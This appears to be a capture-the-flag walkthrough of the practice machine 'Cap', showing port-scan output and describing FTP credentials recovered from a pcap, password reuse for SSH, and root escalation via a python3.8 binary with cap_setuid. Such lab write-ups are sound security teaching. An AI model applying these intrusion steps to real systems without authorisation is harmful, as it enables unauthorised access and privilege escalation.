┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.10.245
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.245:21
Open 10.10.10.245:22
Open 10.10.10.245:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 21,22,80 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 05:49 PDT
Initiating Ping Scan at 05:49
Scanning 10.10.10.245 [4 ports]
Completed Ping Scan at 05:49, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:49
Completed Parallel DNS resolution of 1 host. at 05:49, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 05:49
Scanning 10.10.10.245 [3 ports]
Discovered open port 80/tcp on 10.10.10.245
Discovered open port 21/tcp on 10.10.10.245
Discovered open port 22/tcp on 10.10.10.245
Completed SYN Stealth Scan at 05:49, 0.27s elapsed (3 total ports)
Nmap scan report for 10.10.10.245
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-10-14 05:49:03 PDT for 1s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
Raw packets sent: 7 (284B) | Rcvd: 6 (240B)
It looks like there a few ports open that I might want to test. But first its best to see where the IP address leads.
Press enter or click to view image in full size
It seems to be an exposed security dashboard. Not good. Lets quickly run a feroxbuster scan and see what else I can find.
Nothing that immediately stands out was revealed, most of the URLs link to pages I can already access. So its time to try and poke around and see what the open ports can provide.
I then started to try and connect to the FTP to see if there was an anonymous login I could use.
Interestingly enough, there was a version number for the FTP server. A quick Google for exploits sadly resulted in nothing other than a way to DDoS attack it. (CVE-2021–30047).
After looking around a few of the pages I noticed there was a file avaliable to download, a pcap file to be exact.
Press enter or click to view image in full size
Initially it didn’t result in too much, but the URL of the webpage made it seem like there could be additional pages of data hidden from view. If there was a data set 1, maybe there were more?
2, 3 and 4 didn’t result in anything. But 0 did.
Press enter or click to view image in full size
There were now values associated with the Data Types. Time to download this new pcap file and see what I could find!
Press enter or click to view image in full size
Perfect, this file contains a ton of information that I can scan through and fine something to help me get a foothold. After a brief search I discovered someone was trying to log into that FTP server that I was unable to get access too before.
A user named nathan with the password clearly written below it. Success.
After trying to log into the FTP server several times, using different parameters it seems to always kick me out. I am not sure why, so my next thought was to try and login to the SSH with the same credentials, since some users foolishly use the same login for everything.
Turns out they do use the same password. And now I have the user flag!
Privilege escalation
Now to try and get the root flag! First I am going to upload and run LinPEAS to try and find an vulnerabilities that could lead me to getting root access.
After running LinPEAS on the target system, it found a vulnerability which we could use to get root access. It looks like a misconfigured python3.8 binary is present. After some research its very apparent that python3.8 binary having cap_setuid capabilities assigned to it means it can be used to manipulate its own process ID to maintain privileged access.
After gaining root access I got the flag to finish the box! Its pretty important to make sure your binaries aren’t misconfigured, allowing for this type of privilege escalation.
┌──(zero㉿zero)-[~]
└─$ ssh nathan@10.10.10.245
nathan@10.10.10.245's password:
Permission denied, please try again.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Oct 14 14:26:30 UTC 2024
System load: 0.48 Processes: 226
Usage of /: 36.7% of 8.73GB Users logged in: 0
Memory usage: 22% IPv4 address for eth0: 10.10.10.245
Swap usage: 0%
=> There are 4 zombie processes.
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
